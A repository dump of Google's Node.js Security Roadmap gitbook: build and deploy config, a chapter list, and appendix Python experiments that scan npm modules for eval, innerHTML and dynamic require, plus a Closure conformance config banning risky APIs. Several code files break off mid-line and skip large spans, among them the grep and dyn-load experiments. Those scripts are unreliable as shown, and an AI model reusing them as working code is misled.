├── .bookignore ├── .gitignore ├── .well-known └── security.txt ├── CONTRIBUTING.md ├── CONTRIBUTORS.md ├── LICENSE ├── Makefile ├── README.md ├── SUMMARY.md ├── app.yaml ├── appendix ├── .gitignore ├── bad-pattern-grep │ └── experiment.py ├── dyn-load │ └── experiment.py ├── experiments.md ├── jsconf │ ├── conformance_proto.textproto │ └── experiment.py ├── lazy-load │ └── experiment.py ├── py_common │ ├── __init__.py │ └── npm.py ├── test-code │ └── experiment.py ├── top100.txt └── uses-scripts │ └── experiment.py ├── book.json.withcomments ├── chapter-1 ├── recap.md ├── threat-0DY.md ├── threat-BOF.md ├── threat-CRY.md ├── threat-DEX.md ├── threat-DOS.md ├── threat-EXF.md ├── threat-LQC.md ├── threat-MTP.md ├── threat-QUI.md ├── threat-RCE.md ├── threat-SHP.md ├── threat-UIR.md └── threats.md ├── chapter-2 ├── bounded-eval.md ├── bundling.md ├── dynamism.md ├── example │ ├── .gitignore │ ├── graphs │ │ ├── filtered.dot │ │ ├── filtered.svg │ │ ├── full.dot │ │ └── full.svg │ ├── index.js │ ├── lib │ │ ├── dynamic.js │ │ ├── lazy.js │ │ ├── opt2.js │ │ └── static.js │ ├── make_dep_graph.sh │ ├── package.json │ └── test │ │ └── test.js ├── experiments │ └── webpack-compat │ │ ├── .gitignore │ │ ├── goodbye.js │ │ ├── hello.js │ │ ├── index.js │ │ ├── package.json │ │ ├── test-utils.js │ │ ├── test.sh │ │ ├── test │ │ └── test.js │ │ └── webpack.config.js ├── source-contents.md ├── synthetic-modules.md └── what-about-eval.md ├── chapter-3 └── knowing_dependencies.md ├── chapter-4 └── close_dependencies.md ├── chapter-5 └── oversight.md ├── chapter-6 └── failing.md ├── chapter-7 ├── child-processes.md ├── examples │ ├── sh │ │ ├── index.js │ │ ├── package.json │ │ └── test │ │ │ └── test.js │ └── sql │ │ ├── index.js │ │ ├── package.json │ │ └── test │ │ └── test.js ├── libraries.md ├── query-langs.md └── structured-strings.md ├── cover.md ├── images ├── FileExternal.svg ├── GitHub-Mark-32px.png ├── ic_print_24dp.svg └── npmjs-node.png ├── license.md ├── 
package-lock.json ├── package.json ├── styles └── website.css └── third_party ├── __init__.py └── jslex ├── __init__.py └── jslex.py /.bookignore: -------------------------------------------------------------------------------- 1 | app.yaml 2 | Makefile 3 | book.json.withcomments 4 | appendix/**/*.py 5 | appendix/**/*.textproto 6 | chapter-2/example/**/*.js 7 | chapter-2/experiments/**/*.js 8 | chapter-7/examples/**/*.js 9 | CONTRIBUTING.md 10 | **/*.sh 11 | third_party 12 | package.json 13 | package-lock.json 14 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # See appendix/README.md for how to run experiments. 2 | appendix/jsconf/externs 3 | appendix/tools 4 | # Generated by `npm install` 5 | node_modules 6 | npm-debug.log 7 | chapter-2/example/package-lock.json 8 | # Generated by Makefile 9 | www 10 | deploy 11 | .*.tstamp 12 | #book.json # Should be ignored but breaks gitbook 13 | # Generated by `gitbook serve` 14 | _book 15 | # Emacs droppings 16 | .\#* 17 | *~ 18 | # Python droppings 19 | *.pyc 20 | -------------------------------------------------------------------------------- /.well-known/security.txt: -------------------------------------------------------------------------------- 1 | Contact: mikesamuel@gmail.com 2 | Acknowledgement: https://github.com/google/node-sec-roadmap/tree/master/CONTRIBUTORS.md 3 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # How to Contribute 2 | 3 | We'd love to accept your patches and contributions to this project. There are 4 | just a few small guidelines you need to follow. 5 | 6 | ## Contributor License Agreement 7 | 8 | Contributions to this project must be accompanied by a Contributor License 9 | Agreement. 
You (or your employer) retain the copyright to your contribution; 10 | this simply gives us permission to use and redistribute your contributions as 11 | part of the project. Head over to <https://cla.developers.google.com/> to see 12 | your current agreements on file or to sign a new one. 13 | 14 | You generally only need to submit a CLA once, so if you've already 15 | submitted one (even if it was for a different project), you probably 16 | don't need to do it again. 17 | 18 | ## Code reviews 19 | 20 | All submissions, including submissions by project members, require review. We 21 | use GitHub pull requests for this purpose. Consult 22 | [GitHub Help](https://help.github.com/articles/about-pull-requests/) for more 23 | information on using pull requests. 24 | -------------------------------------------------------------------------------- /CONTRIBUTORS.md: -------------------------------------------------------------------------------- 1 | * [Ali Ijaz Sheikh](https://github.com/ofrobots) 2 | * [Franziska Hinkelmann](https://github.com/fhinkel/) 3 | * [Jen Tong](https://github.com/mimming) 4 | * [John J. Barton](https://github.com/johnjbarton) 5 | * [Justin Beckwith](https://github.com/JustinBeckwith) 6 | * [Mark S. 
Miller](https://github.com/erights) 7 | * [Mike Samuel](https://github.com/mikesamuel) 8 | * [Myles Borins](https://github.com/mylesborins) 9 | 10 | Special thanks for feedback and criticism: 11 | 12 | * [Matteo Collina](https://github.com/mcollina) 13 | * [Rich Trott](https://github.com/Trott) 14 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Markdown and gitbook content is (C) Google LLC and is 2 | made available under 3 | https://creativecommons.org/licenses/by/4.0/ 4 | 5 | 6 | Code is available under the Apache 2.0 License 7 | --------------------------------------------- 8 | Copyright 2017 Google LLC 9 | 10 | Licensed under the Apache License, Version 2.0 (the "License"); 11 | you may not use this file except in compliance with the License. 12 | You may obtain a copy of the License at 13 | 14 | https://www.apache.org/licenses/LICENSE-2.0 15 | 16 | Unless required by applicable law or agreed to in writing, software 17 | distributed under the License is distributed on an "AS IS" BASIS, 18 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 19 | See the License for the specific language governing permissions and 20 | limitations under the License. -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | # This Makefile builds various versions of the Gitbook, runs 2 | # sanity checks, and sets up a deployment directory. 
3 | # 4 | # See `make help` 5 | 6 | define HELP 7 | Targets 8 | ======= 9 | `make book` puts HTML files under www/ 10 | `make pdf` builds the PDF version 11 | `make serve_static` serve the book from http://localhost:4000/ 12 | `make serve` launch the builtin gitbook debug server 13 | `make check` runs sanity checks 14 | `make deploy` builds the deployment directory and runs checks 15 | 16 | Setup 17 | ===== 18 | This assumes that PATH includes 19 | https://github.com/gjtorikian/html-proofer 20 | https://calibre-ebook.com/download 21 | that the following environment variables point to reasonable values: 22 | HTML_PROOFER # path to htmlproofer executable 23 | CALIBRE_HOME # path to directory containing calibre executables 24 | 25 | Deploying 26 | ========= 27 | `make deploy` builds the deploy directory. 28 | From that directory `gcloud app deploy --project node-sec-roadmap` 29 | deploys to the canonical location if you have the right 30 | privileges and have run `gcloud auth login`. 31 | endef 32 | export HELP 33 | 34 | 35 | ROOT_DIR:=$(shell dirname $(realpath $(lastword $(MAKEFILE_LIST)))) 36 | 37 | # External dependency used to detect dead links 38 | ifeq ($(HTML_PROOFER),) 39 | HTML_PROOFER:=${HOME}/.gem/ruby/2.4.0/gems/html-proofer-3.8.0/bin/htmlproofer 40 | ifeq (,$(wildcard ${HTML_PROOFER})) 41 | HTML_PROOFER:=/bin/echo 42 | endif 43 | endif 44 | 45 | # External dependency used to build pdf 46 | ifeq ($(CALIBRE_HOME),) 47 | CALIBRE_HOME:=/Applications/calibre.app/Contents/console.app/Contents/MacOS/ 48 | endif 49 | 50 | 51 | # Bits that gitbook depends on 52 | GITBOOK_DEPS := node_modules book.json cover.md SUMMARY.md CONTRIBUTORS.md \ 53 | $(wildcard chapter-*/*.md) appendix/experiments.md \ 54 | styles/website.css images/* 55 | 56 | 57 | help: 58 | @echo "$$HELP" 59 | 60 | book.json : book.json.withcomments 61 | @cat book.json.withcomments \ 62 | | perl -ne 'print unless m/^[ \t]*#/' > book.json 63 | 64 | pdf : www/node-sec-roadmap.pdf 65 | 
www/node-sec-roadmap.pdf : $(GITBOOK_DEPS) 66 | PATH="${PATH}:./node_modules/.bin/:${CALIBRE_HOME}" \ 67 | ./node_modules/.bin/gitbook pdf . www/node-sec-roadmap.pdf 68 | 69 | book : www/.book.tstamp 70 | www/.book.tstamp : $(GITBOOK_DEPS) 71 | "${ROOT_DIR}"/node_modules/.bin/gitbook build . www 72 | @touch www/.book.tstamp 73 | 74 | check : .check.tstamp 75 | .check.tstamp : deploy/.deploy.tstamp 76 | touch .check.tstamp 77 | echo Checking that we correctly capitalize npm and Nodejs 78 | echo and that all Markdown link names are defined. 79 | @! find deploy/www/ -name \*.html \ 80 | | xargs egrep '\]\[|[nN][oO][dD][eE]J[sS]|\bN[Pp][Mm]\b' \ 81 | | egrep -v 'x\[a\]\[b\]|this\[x\]\[|[.]jfrog[.]com/' 82 | echo Checking for dead links 83 | @if [ "${HTML_PROOFER}" = "/bin/echo" ]; then \ 84 | echo "Warning: HTML_PROOFER not available"; \ 85 | else \ 86 | echo Running htmlproofer; \ 87 | "${HTML_PROOFER}" \ 88 | --alt-ignore=example/graphs/full.svg \ 89 | "${ROOT_DIR}"/deploy/www/; \ 90 | fi 91 | @find deploy -name node_modules \ 92 | || (echo "deploy/ should not include node_modules"; false) 93 | 94 | serve : $(GITBOOK_DEPS) 95 | "${ROOT_DIR}"/node_modules/.bin/gitbook serve 96 | 97 | serve_static : book 98 | pushd www; python -m SimpleHTTPServer 4000; popd 99 | 100 | clean : 101 | rm -rf www/ deploy/ _book/ book.json .*.tstamp 102 | 103 | node_modules : package.json 104 | npm install --only=prod 105 | @touch node_modules/ 106 | 107 | deploy : deploy/.deploy.tstamp check 108 | deploy/.deploy.tstamp : book pdf app.yaml 109 | rm -rf deploy/ 110 | mkdir deploy/ 111 | cp app.yaml deploy/ 112 | cp -r www/ deploy/www/ 113 | @touch deploy/.deploy.tstamp 114 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Node.js Security Roadmap 2 | 3 | The security roadmap is a [gitbook](https://toolchain.gitbook.com/) 4 | publication available at 5 | 
*[nodesecroadmap.fyi](https://nodesecroadmap.fyi)*. 6 | 7 | ```sh 8 | $ npm start 9 | ``` 10 | 11 | will serve the book via `localhost:4000`. 12 | 13 | ```sh 14 | $ make help 15 | ``` 16 | 17 | will display help information about other options. 18 | 19 | Please file errata at the 20 | [issue tracker](https://github.com/google/node-sec-roadmap/issues) 21 | or send us a pull request. 22 | 23 | If you'd like to help out, please also see our 24 | [contribution guidelines](CONTRIBUTING.md). 25 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | * [Threat Environment](chapter-1/threats.md) 4 | * [Zero Day](chapter-1/threat-0DY.md) 5 | * [Buffer Overflow](chapter-1/threat-BOF.md) 6 | * [Weak Crypto](chapter-1/threat-CRY.md) 7 | * [Poor Developer Experience](chapter-1/threat-DEX.md) 8 | * [Denial of Service](chapter-1/threat-DOS.md) 9 | * [Exfiltration of Data](chapter-1/threat-EXF.md) 10 | * [Low Quality Code](chapter-1/threat-LQC.md) 11 | * [Malicious Third-Party Code](chapter-1/threat-MTP.md) 12 | * [Query Injection](chapter-1/threat-QUI.md) 13 | * [Remote Code Execution](chapter-1/threat-RCE.md) 14 | * [Shell Injection during Production](chapter-1/threat-SHP.md) 15 | * [Unintended Require](chapter-1/threat-UIR.md) 16 | * [Recap](chapter-1/recap.md) 17 | * [Dynamism when you need it](chapter-2/dynamism.md) 18 | * [Dynamic Bundling](chapter-2/bundling.md) 19 | * [Production Source Lists](chapter-2/source-contents.md) 20 | * [What about eval?](chapter-2/what-about-eval.md) 21 | * [Synthetic Modules](chapter-2/synthetic-modules.md) 22 | * [Bounded Eval](chapter-2/bounded-eval.md) 23 | * [Knowing your dependencies](chapter-3/knowing_dependencies.md) 24 | * [Keeping your dependencies close](chapter-4/close_dependencies.md) 25 | * [Oversight](chapter-5/oversight.md) 26 | * [When all else fails](chapter-6/failing.md) 27 | * [Library 
support for safe coding practices](chapter-7/libraries.md) 28 | * [Query languages](chapter-7/query-langs.md) 29 | * [Child processes](chapter-7/child-processes.md) 30 | * [Structured strings](chapter-7/structured-strings.md) 31 | 32 | ---- 33 | 34 | * [Appendix: Experiments](appendix/experiments.md) 35 | * [Contributors](CONTRIBUTORS.md) 36 | * [License](license.md) 37 | * [Errata](https://github.com/google/node-sec-roadmap/issues) 38 | -------------------------------------------------------------------------------- /app.yaml: -------------------------------------------------------------------------------- 1 | # cloud.google.com/appengine/docs/standard/python/config/appref 2 | runtime: python27 3 | api_version: 1 4 | threadsafe: true 5 | 6 | handlers: 7 | - url: / 8 | static_files: www/index.html 9 | upload: www/index.html 10 | secure: always 11 | mime_type: text/html; charset=UTF-8 12 | expiration: 30m 13 | 14 | - url: /(.*[.]html)$ 15 | static_files: www/\1 16 | upload: www/(.*[.]html)$ 17 | secure: always 18 | mime_type: text/html; charset=UTF-8 19 | expiration: 30m 20 | 21 | - url: /(.*[.]css)$ 22 | static_files: www/\1 23 | upload: www/(.*[.]css)$ 24 | secure: always 25 | mime_type: text/css; charset=UTF-8 26 | expiration: 30m 27 | 28 | - url: /(.*[.]js)$ 29 | static_files: www/\1 30 | upload: www/(.*[.]js)$ 31 | secure: always 32 | mime_type: text/javascript; charset=UTF-8 33 | expiration: 30m 34 | 35 | - url: /(.*[.]json)$ 36 | static_files: www/\1 37 | upload: www/(.*[.]json)$ 38 | secure: always 39 | mime_type: application/json; charset=UTF-8 40 | expiration: 30m 41 | 42 | - url: /(.*[.]txt)$ 43 | static_files: www/\1 44 | upload: www/(.*[.]txt)$ 45 | secure: always 46 | mime_type: text/plain; charset=UTF-8 47 | expiration: 30m 48 | 49 | - url: /(.*[.]svg)$ 50 | static_files: www/\1 51 | upload: www/(.*[.]svg)$ 52 | secure: always 53 | mime_type: image/svg+xml; charset=UTF-8 54 | expiration: 30m 55 | 56 | - url: 
/(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$ 57 | static_files: www/\1 58 | upload: www/(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$ 59 | secure: always 60 | expiration: 30m 61 | 62 | skip_files: 63 | - ^(.*/)?#.*#$ 64 | - ^(.*/)?.*~$ 65 | - ^(.*/)?.*\.py[co]$ 66 | - ^(.*/)?.*/RCS/.*$ 67 | - ^(.*/)?\.(?!well-known(?:/|$)).*$ 68 | -------------------------------------------------------------------------------- /appendix/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules/** 2 | separate-modules/** 3 | **~ 4 | **.pyc 5 | -------------------------------------------------------------------------------- /appendix/bad-pattern-grep/experiment.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Copyright 2017 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # https://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | """ 18 | Look for problematic patterns like calls to eval and assignments 19 | to innerHTML that often lead to XSS when not consistently guarded. 
20 | """ 21 | 22 | import py_common.npm 23 | import re 24 | import sys 25 | 26 | _LEFT_BOUNDARY = r'(?> 2], 103 | values[len(values) >> 1], 104 | values[(len(values) * 3) >> 2], 105 | ) 106 | print "| `%s` | %d | %d | %s |" % ( 107 | v, count, total_count, quartiles) 108 | -------------------------------------------------------------------------------- /appendix/dyn-load/experiment.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Copyright 2017 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # https://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | """Looks for dynamic code loading patterns. 18 | 19 | Patterns to identify include 20 | 21 | * require(...) where ... is not a string literal. 22 | * eval 23 | * Function(...) where there is more than one argument or the sole 24 | argument is not a function. 25 | 26 | """ 27 | 28 | import json 29 | import os.path 30 | import py_common.npm 31 | import re 32 | import shutil 33 | import sys 34 | 35 | 36 | dynamic_load_pattern = re.compile( 37 | r'(? 9 | 10 | ## Grepping for Problems {#grep-problems} 11 | 12 | JS Conformance uses sophisticated type reasoning to find 13 | problems in JavaScript code 14 | (see [JS Conformance experiment](#jsconf)). 15 | It may not find problems in code that lacks type hints 16 | or that does not parse. 17 | 18 | Grep can be used to reliably find some subset of problems that 19 | JS Conformance can identify. 
20 | 21 | If grep finds more of the kinds of problems that it can find 22 | than JS Conformance, then the code cannot be effectively vetted 23 | by code quality tools like JS Conformance. 24 | 25 | | Violation | Count of Modules | Total Count | Quartiles | 26 | | --------- | ---------------- | ----------- | --------- | 27 | | `Function constructor` | 32 | 200 | 0 / 0 / 1 | 28 | | `URL property assignment` | 35 | 471 | 0 / 0 / 3 | 29 | | `eval` | 24 | 87 | 0 / 0 / 0 | 30 | | `innerHTML assignment` | 17 | 81 | 0 / 0 / 0 | 31 | 32 | ## Dynamic loads {#dynamic_load} 33 | 34 | Dynamic loading can complicate code bundling. 35 | 36 | 33 of 108 = 30.56% call `require(...)` without a literal string argument. 37 | 38 | ## JS Conformance {#jsconf} 39 | 40 | JS Conformance identifies uses of risky APIs. 41 | 42 | Some modules did not parse. This may be due to TypeScript. 43 | JSCompiler doesn't deal well with mixed JavaScript and TypeScript 44 | inputs. 45 | 46 | If a module is both in the top 100 and is a dependency of another 47 | module in the top 100, then it will be multiply counted. 48 | 49 | Out of 69 modules that parsed 50 | 51 | | Violation | Count of Modules | Total Count | Quartiles | 52 | | --------- | ---------------- | ----------- | --------- | 53 | | `"arguments.callee" cannot be used in strict mode` | 2 | 3 | 0 / 0 / 0 | 54 | | `Argument list too long` | 8 | 8 | 0 / 0 / 0 | 55 | | `Illegal redeclared variable: ` | 2 | 9 | 0 / 0 / 0 | 56 | | `Parse error.` | 31 | 232 | 0 / 0 / 2 | 57 | | `This style of octal literal is not supported in strict mode.` | 4 | 11 | 0 / 0 / 0 | 58 | | `Violation: Assigning a value to a dangerous property via setAttribute is forbidden` | 1 | 4 | 0 / 0 / 0 | 59 | | `Violation: Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...` | 9 | 91 | 0 / 0 / 0 | 60 | | `Violation: eval is not allowed` | 1 | 3 | 0 / 0 / 0 | 61 | | `required "..." 
namespace not provided yet` | 7 | 30 | 0 / 0 / 0 | 62 | | `type syntax is only supported in ES6 typed mode: ` | 3 | 132 | 0 / 0 / 0 | 63 | 64 | ## Lazy loads {#lazy_load} 65 | 66 | Lazy loading can complicate code bundling if care is not taken. 67 | 68 | 71 of 108 = 65.74% contain a use of require inside a `{...}` block. 69 | 70 | 71 | ## Prod bundle includes test code {#test_code} 72 | 73 | Some of the top 100 modules are test code, e.g. mocha, chai. 74 | This measures which modules, when installed `--only=prod` include 75 | test patterns. 76 | 77 | 50 of 108 = 46.30% contain test code patterns 78 | 79 | 80 | ## Uses Scripts {#uses_scripts} 81 | 82 | Unless steps are taken, installation scripts run code on 83 | a developer's workstation when they have write access to 84 | local repositories. If this number is small, having 85 | humans check installation scripts before running might 86 | be feasible. 87 | 88 | 4 of 979 = 0.41% use installation scripts 89 | 90 | 91 | 92 | 93 | 94 | 95 | ## Methodology 96 | 97 | The code is [available on Github][code]. 98 | 99 | ```bash 100 | $ npm --version 101 | 3.10.10 102 | ``` 103 | 104 | ### Top 100 Module list 105 | 106 | I extracted `top100.txt` by browsing to the most depended-upon 107 | [package list][top100] and running the below in the dev console until 108 | I had >= 100 entries. 109 | 110 | ```js 111 | var links = document.querySelectorAll('a.name') 112 | var top100 = Object.create(null) 113 | for (var i = 0; i < links.length; ++i) { 114 | var link = links[i]; 115 | var packageName = link.getAttribute('href').replace(/^.*\/package\//, '') 116 | top100[packageName] = true; 117 | } 118 | var top100Names = Object.keys(top100) 119 | top100Names.sort(); 120 | top100Names 121 | ``` 122 | 123 | ---- 124 | 125 | We also require some tools so that we can run JSCompiler against 126 | node modules. 
From the root directory: 127 | 128 | ```sh 129 | mkdir tools 130 | curl https://dl.google.com/closure-compiler/compiler-latest.zip \ 131 | > /tmp/closure-latest.zip 132 | pushd tools 133 | jar xf /tmp/closure-latest.zip 134 | popd 135 | pushd jsconf 136 | mkdir externs 137 | pushd externs 138 | git clone https://github.com/dcodeIO/node.js-closure-compiler-externs.git 139 | popd 140 | popd 141 | ``` 142 | 143 | 144 | ### Experiments 145 | 146 | Each experiment corresponds to a directory with an executable 147 | `experiment.py` file which takes a `node_modules` directory and the top 100 148 | module list and which outputs a snippet of markup. 149 | 150 | Running 151 | 152 | ```bash 153 | cat top100.txt | xargs npm install --ignore-scripts --only=prod 154 | mkdir separate-modules 155 | cd separate-modules 156 | for pn in $(cat ../top100.txt ); do 157 | mkdir -p "$pn" 158 | pushd "$pn" 159 | npm install -g --prefix="node_modules/$pn" --ignore-scripts --only=prod "$pn" 160 | popd 161 | done 162 | ``` 163 | 164 | pulls down the list of node modules. As of this writing, there are 980 165 | modules that are in the top100 list or are direct or indirect prod 166 | dependencies thereof. 167 | 168 | To run the experiments and place the outputs under `/tmp/mds/`, run 169 | 170 | ```bash 171 | mkdir -p /tmp/mds/ 172 | export PYTHONPATH="$PWD:$PWD/../third_party:$PYTHONPATH" 173 | for f in *; do 174 | if [ -f "$f"/experiment.py ]; then 175 | "$f"/experiment.py node_modules separate-modules top100.txt \ 176 | > "/tmp/mds/$f.md" 177 | fi 178 | done 179 | ``` 180 | 181 | Concatenating those markdown snippets produces the summary above. 
182 | 183 | ```bash 184 | (for f in $(echo /tmp/mds/*.md | sort); do 185 | cat "$f"; 186 | done) \ 187 | > /tmp/mds/summary 188 | ``` 189 | 190 | [code]: https://github.com/google/node-sec-roadmap/tree/master/appendix 191 | [top100]: https://www.npmjs.com/browse/depended 192 | -------------------------------------------------------------------------------- /appendix/jsconf/conformance_proto.textproto: -------------------------------------------------------------------------------- 1 | # Copyright 2014 The Closure Compiler Authors. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | # This file contains example JS conformance configurations for various problems 16 | # with JavaScript. Since each project may want to opt-in to different rules, and 17 | # each project may need its own specific whitelist, the examples in this file 18 | # are meant to be copied to a project specific conformance_proto.textproto file. 
19 | 20 | requirement: { 21 | type: BANNED_NAME 22 | error_message: 'eval is not allowed' 23 | 24 | value: 'eval' 25 | 26 | whitelist: 'javascript/closure/base.js' 27 | whitelist: 'javascript/closure/json/json.js' 28 | } 29 | 30 | requirement: { 31 | rule_id: 'closure:stringFunctionDefinition' 32 | type: RESTRICTED_NAME_CALL 33 | 34 | value: 'Function:function()' 35 | value: 'setTimeout:function(string, ...?)' 36 | value: 'setImmediate:function(string, ...?)' 37 | value: 'setInterval:function(string, ...?)' 38 | value: 'requestAnimationFrame:function(string, ...?)' 39 | 40 | error_message: 'Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...' 41 | } 42 | 43 | requirement: { 44 | rule_id: 'closure:windowStringFunctionDefinition' 45 | type: RESTRICTED_METHOD_CALL 46 | 47 | value: 'Window.prototype.setTimeout:function(string, ...?)' 48 | value: 'Window.prototype.setImmediate:function(string, ...?)' 49 | value: 'Window.prototype.setInterval:function(string, ...?)' 50 | value: 'Window.prototype.requestAnimationFrame:function(string, ...?)' 51 | 52 | error_message: 'window.setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...' 53 | } 54 | 55 | requirement: { 56 | type: BANNED_PROPERTY 57 | error_message: 'Arguments.prototype.callee' 58 | 59 | value: 'Arguments.prototype.callee' 60 | 61 | whitelist: 'javascript/closure/base.js' # goog.base uses arguments.callee 62 | whitelist: 'javascript/closure/debug/' # legacy stack trace support, etc 63 | } 64 | 65 | requirement: { 66 | type: BANNED_PROPERTY_WRITE 67 | error_message: 'Assignment to Element.prototype.innerHTML is not allowed' 68 | 69 | value: 'Object.innerHTML' 70 | 71 | # Safe wrapper for this property. 72 | whitelist: 'javascript/closure/dom/safe.js' 73 | 74 | # Safely used in goog.string.unescapeEntitiesUsingDom_; the string assigned to 75 | # innerHTML is a single HTML entity. 
76 | whitelist: 'javascript/closure/string/string.js' 77 | } 78 | 79 | requirement: { 80 | type: BANNED_PROPERTY_WRITE 81 | error_message: 'Assignment to Element.prototype.outerHTML is not allowed' 82 | 83 | value: 'Object.outerHTML' 84 | 85 | # Safe wrapper for this property. 86 | whitelist: 'javascript/closure/dom/safe.js' 87 | } 88 | 89 | requirement: { 90 | type: BANNED_PROPERTY_WRITE 91 | error_message: 'Assignment to Location.prototype.href is not allowed' 92 | 93 | value: 'Location.prototype.href' 94 | 95 | # Safe wrapper for this property. 96 | whitelist: 'javascript/closure/dom/safe.js' 97 | } 98 | 99 | requirement: { 100 | type: BANNED_PROPERTY_WRITE 101 | error_message: 'Assignment to location is not allowed' 102 | 103 | value: 'Window.prototype.location' 104 | } 105 | 106 | requirement: { 107 | type: BANNED_PROPERTY_WRITE 108 | error_message: 'Assignment to .href property or src' 109 | 110 | # Types with .href properties that do not extend from Element. 111 | # value: 'StyleSheet.prototype.href' 112 | # value: 'CSSImportRule.prototype.href' 113 | 114 | # All other types extend from Element. 115 | # value: 'Element.prototype.href' 116 | value: 'Object.href' 117 | value: 'Object.src' 118 | 119 | # Safe wrapper for this property. 
120 | whitelist: 'javascript/closure/dom/safe.js' 121 | } 122 | 123 | requirement: { 124 | rule_id: 'setAttribute URL' 125 | type: BANNED_CODE_PATTERN 126 | error_message: 'Assigning a value to a dangerous property via setAttribute is forbidden' 127 | value: 128 | '/**\n' 129 | ' * @param {*} element\n' 130 | ' * @param {?} value\n' 131 | ' */\n' 132 | 'function template(element, value) {' 133 | ' element.setAttribute(\'src\', value);' 134 | '}' 135 | value: 136 | '/**\n' 137 | ' * @param {*} element\n' 138 | ' * @param {?} value\n' 139 | ' */\n' 140 | 'function template(element, value) {\n' 141 | ' element.setAttribute(\'href\', value);\n' 142 | '}' 143 | } 144 | 145 | requirement: { 146 | type: BANNED_PROPERTY_WRITE 147 | error_message: 'Use of document.domain is not allowed' 148 | 149 | value: 'Document.prototype.domain' 150 | } 151 | -------------------------------------------------------------------------------- /appendix/jsconf/experiment.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | Runs JSConformance on each of the top 100 modules and collates the results. 5 | """ 6 | 7 | # Copyright 2017 Google LLC 8 | # 9 | # Licensed under the Apache License, Version 2.0 (the "License"); 10 | # you may not use this file except in compliance with the License. 11 | # You may obtain a copy of the License at 12 | # 13 | # https://www.apache.org/licenses/LICENSE-2.0 14 | # 15 | # Unless required by applicable law or agreed to in writing, software 16 | # distributed under the License is distributed on an "AS IS" BASIS, 17 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 18 | # See the License for the specific language governing permissions and 19 | # limitations under the License. 
# Extracts the message part of each "<location>: ERROR - <message>" line
# in the compiler output; messages that start with ". " are not matched.
_error_re = re.compile(r'(?m)^\S+: ERROR - ((?![.]\s)[^\r\n]*)')
# Patterns that can be used to group error messages by glossing over
# any content not in a capturing group.
_simplifier_res = (
    re.compile(r'^(required ").*?(" namespace not provided yet)'),
    re.compile(r'^(type syntax is only supported in ES6 typed mode: ).*'),
    re.compile(r'^(Illegal redeclared variable: ).*'),
    re.compile(r'^(Parse error[.]).*'),
)


def run_jsconf(node_modules, module_name, externs):
    """
    Runs JSConformance on the given module's source files.

    node_modules -- path to the node_modules directory.  The compiler jar
        (tools/closure-compiler-latest/closure-compiler.jar) and the
        conformance config (jsconf/conformance_proto.textproto) are looked
        up under its parent directory.
    module_name -- name of the module whose sources are checked.
    externs -- iterable of externs file paths; passed in sorted order.

    Returns a list of violation messages, one per ERROR line in the
    compiler output, each simplified by the first matching pattern in
    _simplifier_res.  The list starts with 'Passed' when the compiler
    exits with status 0.  Returns ['Argument list too long'] without
    running the compiler when the command line would be too long.

    Raises Exception when no source files are found for the module.
    """
    srcs = py_common.npm.js_srcs_almost_worst_case(
        node_modules, module_name,
        module_filter=py_common.npm.ignore_tools_that_can_run_early(
            module_name))
    if not srcs:
        raise Exception(module_name + ' has no srcs')

    appendix_root = os.path.dirname(node_modules)
    args = [
        'java',
        '-jar',
        os.path.join(
            appendix_root,
            'tools',
            'closure-compiler-latest',
            'closure-compiler.jar'),
        '--process_common_js_modules',
        '--checks-only',
        '--third_party=true',
        '--module_resolution=NODE',
        '--js_module_root=%s' % os.path.realpath(node_modules),
        '--jscomp_error=conformanceViolations',
        '--conformance_configs',
        os.path.join(
            appendix_root,
            'jsconf',
            'conformance_proto.textproto'),
    ]
    for (_, js_file) in srcs:
        args += ['--js', os.path.realpath(js_file)]
    for externs_file in sorted(externs):
        args += ['--externs', externs_file]

    if len(' '.join(args)) >= 240000:  # `getconf ARG_MAX` for Mac OSX
        return ['Argument list too long']

    process = subprocess.Popen(
        args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    # communicate() drains the merged stdout/stderr stream, closes the
    # pipe and waits for the process to exit.
    content, _ = process.communicate()

    violations = []
